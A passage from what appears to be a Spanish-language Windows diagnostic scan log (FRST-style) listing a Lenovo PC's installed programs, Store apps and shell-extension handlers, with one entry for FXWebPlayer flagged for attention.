Catalyst Control Center Next Localization RU (HKLM\...\{55BC43A3-658F-563E-594C-77ECC3AD80CA}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{9AA4DD93-94BF-22EA-C9D2-7084F304A31B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{379D900B-A785-6DB0-012E-434356A365B3}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{6EDB0F66-7340-1DEB-FB7A-874F7F313B9A}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{1410AA8E-47E8-8E26-EC81-D895937CF70E}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{366C4FB5-CF6E-258B-418D-E6D29549A278}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{197698FD-E2D1-1335-49D7-5BD16F310B9F}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B10089DE-934F-6E0F-683A-B788F89348DF}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.65 - Piriform)
Child of Light (HKLM-x32\...\Uplay Install 609) (Version:  - Ubisoft)
Chronicles of the Witches and Warlocks (HKLM-x32\...\Chronicles of the Witches and Warlocks_is1) (Version:  - FreeGamePick)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.66.31.55 - Conexant)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Disk Drill 4.0.521.0 (HKLM-x32\...\{a8ca0956-f8c2-46e2-96fb-ae2c997dc11c}) (Version: 4.0.521.0 - CleverFiles)
Disk Drill 4.0.521.0 (x64) (HKLM\...\{EA9AFACB-A92D-4246-BB5E-7BA730C924A9}) (Version: 4.0.521.0 - CleverFiles) Hidden
Dokan Library 1.2.0.1000 (x64) (HKLM\...\{65A3A964-3DC3-0102-0000-180809151012}) (Version: 1.2.0.1000 - Dokany Project) Hidden
Dokan Library 1.2.0.1000 Bundle (HKLM-x32\...\{c2f619b0-68fd-4433-970e-cd66cd7a2775}) (Version: 1.2.0.1000 - Dokany Project)
Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.)
Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.)
dr.fone (Version 9.9.8) (HKLM-x32\...\{E8F86DA8-B8E4-42C7-AFD4-EBB692AC43FD}_is1) (Version: 9.9.8.41 - Wondershare Technology Co.,Ltd.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
FX Store v1.1 (HKLM-x32\...\{040C1AC6-02A3-4B26-9C7D-1E8CA46C57ED}_is1) (Version: 1.1 - FX Interactive, SL.)
FXWebPlayer (HKLM-x32\...\FXWebPlayer) (Version:  - FX Interactive) <==== ATENCIÓN
Galería de fotos (HKLM-x32\...\{F7314CA2-F900-46D7-9EA1-FBDD9D73F765}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Google Earth Pro (HKLM-x32\...\{ECF2E224-42F5-4E50-B58E-94CA70E85697}) (Version: 7.3.0.3832 - Google)
Great Secrets DaVinci (HKLM-x32\...\Great Secrets DaVinci_is1) (Version:  - FreeGamePick)
GV LicenseManager (HKLM\...\{AE2F71E5-A410-463E-A25E-D45A4D1DB832}) (Version: 9.51.5619 - Grass Valley K.K.)
HandBrake 1.3.1 (HKLM-x32\...\HandBrake) (Version: 1.3.1 - )
Handset WinDriver 1.02.02.00 (HKLM-x32\...\Handset WinDriver) (Version: 1.02.02.00 - Huawei technologies Co., Ltd.)
Hard Disk Low Level Format Tool 4.40 (HKLM-x32\...\Hard Disk Low Level Format Tool_is1) (Version:  - HDDGURU)
HiSuite (HKLM-x32\...\Hi Suite) (Version: 10.0.1.100 - Huawei Technologies Co.,Ltd)
HP Deskjet 1050 J410 series Estudio para la mejora del producto (HKLM\...\{857BB9C2-560B-4D85-A586-7CCDF1D4CB15}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 1050 J410 series Software básico del dispositivo (HKLM\...\{C585DE2E-0AC0-404C-AC0E-8F5ED300BA93}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Photo Creations (HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
Icecream Screen Recorder versión 6.16 (HKLM-x32\...\{7ADEC622-3230-4C9A-9DCE-9BD462B74095}_is1) (Version: 6.16 - Icecream Apps)
In Search Of The Lost Temple (HKLM-x32\...\In Search Of The Lost Temple_is1) (Version:  - FreeGamePick)
InPixio Photo Maximizer (HKLM-x32\...\{33DB8C17-40C9-4629-B6D4-05A4C7E8AA86}) (Version: 1.20.25799 - Avanquest Software)
InterVideo WinDVD Creator 2 (HKLM-x32\...\{2FCE4FC5-6930-40E7-A4F1-F862207424EF}) (Version: 2.0.14.377 - InterVideo Inc.)
Java 8 Update 241 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
Java SE Development Kit 8 Update 141 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180141}) (Version: 8.0.1410.15 - Oracle Corporation)
JPEG Recovery LAB (HKLM\...\{99ECC4DD-4564-48A0-9F4D-44263B067ECD}_is1) (Version:  - www.disktuna.com)
Junk Mail filter update (HKLM-x32\...\{F6F30C28-38AA-4DBA-AE0B-7E30238E61BB}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Lenovo Connect2+ Beta (HKLM-x32\...\Connect2+_is1) (Version: 4.2.5.4885 - Lenovo)
Lenovo OneKey Recovery (HKLM\...\{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4706 - CyberLink Corp.)
Lenovo System Update (HKLM-x32\...\TVSU_is1) (Version: 5.07.0092 - Lenovo)
Lenovo Vantage Service (HKLM-x32\...\VantageSRV_is1) (Version: 3.2.93.0 - Lenovo Group Ltd.)
Mages of Mystralia Archmage (HKLM-x32\...\Mages of Mystralia Archmage_is1) (Version:  - )
Malwarebytes version 4.1.0.56 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.1.0.56 - Malwarebytes)
Manuales de usuario (HKLM-x32\...\{7042D952-EE42-4C09-A23D-E7AE4D047007}) (Version: 6.0.0.0 - Lenovo) Hidden
Microsoft Office 365 - es-es (HKLM\...\O365HomePremRetail - es-es) (Version: 16.0.12730.20236 - Microsoft Corporation)
Microsoft Office Profesional Plus 2016 - es-es (HKLM\...\ProPlusRetail - es-es) (Version: 16.0.12730.20236 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\OneDriveSetup.exe) (Version: 19.192.0926.0012 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{45898170-E68C-4F02-AA35-C2186BF347A3}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{F25C8769-16B6-4B19-BB0B-76F213829AC6}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 76.0.1 (x64 es-ES) (HKLM\...\Mozilla Firefox 76.0.1 (x64 es-ES)) (Version: 76.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 62.0.3 - Mozilla)
Music Recorder (HKLM-x32\...\{F3949798-3544-433B-B5AB-A61F32F0386F}) (Version: 18.001.2 - Nero AG) Hidden
NEF Codec (HKLM-x32\...\{D6506521-0959-4FA3-875F-E2E28830B0D2}) (Version: 1.31.0 - Nikon Corporation)
Nero 2017 (HKLM-x32\...\{F1087DAD-F249-4388-844A-A4BE24BF5BB9}) (Version: 18.0.08500 - Nero AG)
Nero Info (HKLM-x32\...\{F030BFE8-8476-4C08-A553-233DE80A2BE1}) (Version: 18.0.0015 - Nero AG)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.2 - Nikon)
OBD2Spy V2.05 (HKLM-x32\...\ST6UNST #1) (Version:  - )
OEM Application Profile (HKLM-x32\...\{B4B7FD8F-06FC-E277-4F29-8F75F8281D8F}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12730.20206 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12730.20206 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12730.20206 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0C0A-0000-0000000FF1CE}) (Version: 16.0.12730.20206 - Microsoft Corporation) Hidden
OpenOffice 4.1.3 (HKLM-x32\...\{EF451311-C2EC-4245-911F-4847C2294A82}) (Version: 4.13.9783 - Apache Software Foundation)
OpenOffice 4.1.3 Language Pack (Spanish) (HKLM-x32\...\{789DA182-44AA-4DA9-9FA4-F087E4F8B6E9}) (Version: 4.13.9783 - Apache Software Foundation)
OpenShot Video Editor versión 2.4.4 (HKLM\...\{4BB0DCDC-BC24-49EC-8937-72956C33A470}_is1) (Version: 2.4.4 - OpenShot Studios, LLC)
Picture Control Utility 2 (HKLM\...\{46BEAB85-B86A-4AAB-B085-136ECA032CF4}) (Version: 2.3.0 - Nikon Corporation)
Portal 2 (HKLM-x32\...\Postal 2_is1) (Version:  - )
Prerequisite installer (HKLM-x32\...\{EB511CD1-C87C-490D-A7B1-D6C47F57820F}) (Version: 18.0.0003 - Nero AG) Hidden
Profiler The Hopscotch Killer Extended Edition (HKLM-x32\...\Profiler The Hopscotch Killer Extended Edition_is1) (Version:  - FreeGamePick)
Rayman Legends (HKLM-x32\...\Uplay Install 410) (Version:  - Ubisoft)
REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 3.886.880.031016 - REALTEK Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.7.107.2016 - Realtek)
REALTEK RTL8187B Wireless LAN Driver (HKLM-x32\...\{7095FD27-37F0-4750-9DE8-D37DC0043706}) (Version: Package:1.00.0008 Driver:6.1135.625.2008 - REALTEK Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0283 - REALTEK Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.53 - Piriform)
Revo Uninstaller 2.1.1 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.1.1 - VS Revo Group, Ltd.)
Runaway (HKLM-x32\...\Runaway) (Version:  - FX Interactive)
Secrets of the Dark: El Misterio de la Finca Familiar Edición Coleccionista (HKLM-x32\...\BFG-Secrets of the Dark - El Misterio de la Finca Familiar Edicion Coleccionista) (Version:  - )
The Witchs Green Amulet (HKLM-x32\...\The Witchs Green Amulet_is1) (Version:  - FreeGamePick)
Ultimate EPubsoft DRM Removal 13.6.8 (HKLM-x32\...\{F3664D5A-C1EF-4BAA-BFD2-D22F02F136CD}) (Version: 13.6.8 - EPUBSOFT)
UltraISO Premium V9.72 (HKLM-x32\...\UltraISO_is1) (Version:  - )
Unlocker (HKLM\...\{5993C960-4E90-4A00-A2F3-D0C4020A6992}) (Version: 1.9.2 - ajua Custom Installers)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
Uplay (HKLM-x32\...\Uplay) (Version: 107.0 - Ubisoft)
Uptasia (HKLM-x32\...\Uptasia_is1) (Version: 1.0 - MyPlayCity, Inc.)
User Manuals (HKLM-x32\...\InstallShield_{7042D952-EE42-4C09-A23D-E7AE4D047007}) (Version: 6.0.0.0 - Lenovo)
VdhCoApp 1.2.4 (HKLM\...\weh-iss-net.downloadhelper.coapp_is1) (Version:  - DownloadHelper)
Vessel (HKLM-x32\...\Vessel_is1) (Version:  - )
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.10.3 - Nikon)
ViewNX-i (HKLM\...\{3AAC376E-2451-4CD0-9B07-DCC7CBBD578C}) (Version: 1.2.8 - Nikon Corporation)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WebM Media Foundation Components (HKLM-x32\...\webmmf) (Version: 1.0.1.2 - WebM Project)
WhatsApp (HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\WhatsApp) (Version: 2.2017.6 - WhatsApp)
Windows Driver Package - AMD (amdsata) HDC  (04/15/2015 1.3.001.0277) (HKLM\...\38140F56EB78A56DAAFF7606B4559979B9BC3FF7) (Version: 04/15/2015 1.3.001.0277 - AMD)
Windows Driver Package - Intel Corporation (btmaux) BluetoothAuxiliary  (01/09/2019 20.90.4.1) (HKLM\...\0436E70310ADEEAD0F8DAD30030837428104DAA1) (Version: 01/09/2019 20.90.4.1 - Intel Corporation)
Windows Driver Package - Microsoft (BthEnum) Bluetooth  (06/21/2006 10.0.18362.693) (HKLM\...\E2DAD09522507363427EAED6190609F9F45C2B1C) (Version: 06/21/2006 10.0.18362.693 - Microsoft)
Windows Driver Package - Microsoft (CmBatt) Battery  (06/21/2006 10.0.18362.1) (HKLM\...\9187FE3662F0174A3345F4838367D6B09F4B127E) (Version: 06/21/2006 10.0.18362.1 - Microsoft)
Windows Driver Package - Microsoft (monitor) Monitor  (06/21/2006 10.0.18362.693) (HKLM\...\89E9CF657C46F20574B1AACD67A0037C69C3A3D8) (Version: 06/21/2006 10.0.18362.693 - Microsoft)
Windows Driver Package - Microsoft (msisadrv) System  (06/21/2006 10.0.18362.267) (HKLM\...\C21FA28AF00604C4F566A6E98DF45A0DFF32374A) (Version: 06/21/2006 10.0.18362.267 - Microsoft)
Windows Driver Package - NEC Personal Computers, Ltd. (necbatt) Battery  (05/09/2018 1.0.0.6) (HKLM\...\0958F21D5DB378418B496CAAD4C41065587DE322) (Version: 05/09/2018 1.0.0.6 - NEC Personal Computers, Ltd.)
Windows Driver Package - Realtek (RtkA2dp) MEDIA  (06/22/2018 1.1.137.3) (HKLM\...\7C83AD9FED83EE9B2C87041AC20144473043801E) (Version: 06/22/2018 1.1.137.3 - Realtek)
Windows Driver Package - Realtek Semiconductor Corp. (RtkAvrcp) HIDClass  (02/02/2018 1.1.55.3) (HKLM\...\3A33CD024A656998BE83890E84E76E8CBB886C03) (Version: 02/02/2018 1.1.55.3 - Realtek Semiconductor Corp.)
Windows Driver Package - Realtek Semiconductor Corp. (RTWlanE) Net  (09/18/2018 2023.79.0918.2018) (HKLM\...\2FC3CBE0E0E8B61C4B2BDF474CEA2BFF59FD874D) (Version: 09/18/2018 2023.79.0918.2018 - Realtek Semiconductor Corp.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
WinRAR 5.90 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.90.0 - win.rar GmbH)
WIS GO7007SB SW V1.3.3 (HKLM-x32\...\{7B17F1B7-BD27-4F44-8E1D-0FF49ED3F84D}) (Version: 1.3.3000 - WIS Technologies, Inc.) Hidden
WIS GO7007SB SW V1.3.3 (HKLM-x32\...\InstallShield_{7B17F1B7-BD27-4F44-8E1D-0FF49ED3F84D}) (Version: 1.3.3000 - WIS Technologies, Inc.)
wOBD (C:\Program Files (x86)\wOBD\) (HKLM-x32\...\ST6UNST #3) (Version:  - )
wOBD (HKLM-x32\...\ST6UNST #2) (Version:  - )
Wondershare Filmora9(Build 9.4.6) (HKLM\...\Wondershare Filmora9_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
Wondershare Recoverit(Build 8.3.0.12) (HKLM-x32\...\{829555DC-31E5-4FEA-B350-8FCF24CECD95}_is1) (Version: 8.3.0.12 - Wondershare Software Co.,Ltd.)
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)

Packages:
=========
8 Zip - unpack RAR, ZIP, 7z for free -> C:\Program Files\WindowsApps\BooStudioLLC.8ZipLite_1.4.12.0_x64__b6e429xa66pga [2020-05-05] (Finebits OÜ) [MS Ad]
Any Player -> C:\Program Files\WindowsApps\15191PeakPlayer.50533F9B98293_3.1.6.0_x64__y5c4dfz5b21fm [2020-05-05] (Any DVD &amp; Office App)
Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.1.0.0_x64__tf1gferkr813w [2020-05-05] (Autodesk Inc.)
Dolby Access -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAccess_3.2.169.0_x64__rz1tebttyb220 [2020-05-05] (Dolby Laboratories)
Extensión de vídeo MPEG-2 -> C:\Program Files\WindowsApps\Microsoft.MPEG2VideoExtension_1.0.22661.0_x64__8wekyb3d8bbwe [2020-05-05] (Microsoft Corporation)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_110.1.728.0_x64__v10z8vjag6ke6 [2020-05-05] (HP Inc.)
La vuelta al mundo en 80 días - Objetos Ocultos juego español -> C:\Program Files\WindowsApps\38552CrispApp.AroundTheWorldin80DaysHiddenObjectga_1.3.3.0_x64__pnrt47fe6g5q6 [2020-05-05] (CrispApp) [MS Ad]
Lenovo Settings -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoSettings_3.177.0.0_x86__4642shxvsv8s2 [2020-05-05] (LENOVO INCORPORATED.)
Lenovo Vantage -> C:\Program Files\WindowsApps\E046963F.LenovoCompanion_10.2003.10.0_x64__k1h2ywk1493x8 [2020-05-05] (LENOVO INC.)
Lost Lands: Mahjong -> C:\Program Files\WindowsApps\FIVE-BN.LostIslandMahjongAdventure_1.1.29.0_x64__r4ncp3q39h9fa [2020-05-05] (FIVE-BN STUDIO)
MDF to ISO -> C:\Program Files\WindowsApps\41568RaffaeleZippo.MDFtoISO_1.1.6.0_x64__5stwkxsyacxat [2020-05-05] (Raffaele Zippo) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-05-05] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-05-05] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.5012.0_x64__8wekyb3d8bbwe [2020-05-05] (Microsoft Studios) [MS Ad]
Objetos Ocultos - Detective Sherlock Holmes. Juego de aventura gratis -> C:\Program Files\WindowsApps\38552CrispApp.DetectiveSherlockHolmesHiddenObjects_1.3.5.0_x64__pnrt47fe6g5q6 [2020-05-05] (CrispApp) [MS Ad]
OCR [img2txt] -> C:\Program Files\WindowsApps\19083ThomasAlbert-EDVDien.OCRimg2txt_1.5.1924.0_x64__16da8mr9s4r8t [2020-05-05] (Thomas Albert - EDV Dienstleistungen)
PDF Conversion Suite -> C:\Program Files\WindowsApps\28131MobiDreamNet.PDFConversionSuite_2.9.5.0_x64__1k933r27wg1xm [2020-05-05] (Tiny Smart Apps)
Portal de cuenta de Lenovo -> C:\Program Files\WindowsApps\LenovoCorporation.LenovoID_2.0.37.0_x86__4642shxvsv8s2 [2020-05-05] (LENOVO INCORPORATED.)
RAR Opener -> C:\Program Files\WindowsApps\DeviceDoctor.RAROpener_1.3.48.0_x64__mkdtfchztkfbm [2020-05-05] (Tiny Opener)
Reader Notification Client -> C:\Program Files\WindowsApps\ReaderNotificationClient_1.0.4.0_x86__e1rzdqpraam7r [2020-05-05] (Adobe Systems Incorporated)
Trio Office -> C:\Program Files\WindowsApps\64343GTDocStudio.OfficeDocOpener_3.2.16.0_x86__3h5nez1g3qt2c [2020-05-05] (GT Office PDF Studio)
unzip-open RAR,ZIP,7Z,Gzip,BZ for free -> C:\Program Files\WindowsApps\38184CDCTech.unzip-openRARZIP7ZGzipBZforfree_1.2.42.0_x64__vwv5vk6p12k08 [2020-05-05] (Trend Micro Inc.)
UTorrent Remote UI -> C:\Program Files\WindowsApps\17060PavelZhilnikov.UTorrentRemoteUI_1.4.6.0_x64__e27y8d3ervnmm [2020-05-05] (Pavel Zhilnikov) [MS Ad]
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.12730.20086.0_x64__8wekyb3d8bbwe [2020-05-05] (Microsoft Corporation)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
ContextMenuHandlers1: [BtSendToMenuEx] -> {CF24E6B8-F148-4BCB-9108-ADF313966E80} => C:\Program Files (x86)\REALTEK\Realtek Bluetooth\DevMenuExt.dll [2014-07-03] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => C:\Program Files (x86)\UltraISO\isoshl64.dll [2015-10-08] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-05-08] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2016-06-06] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers4: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => C:\Program Files (x86)\UltraISO\isoshl64.dll [2015-10-08] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-08-08] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-05-08] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2016-06-06] (Piriform Ltd -> Piriform Ltd)
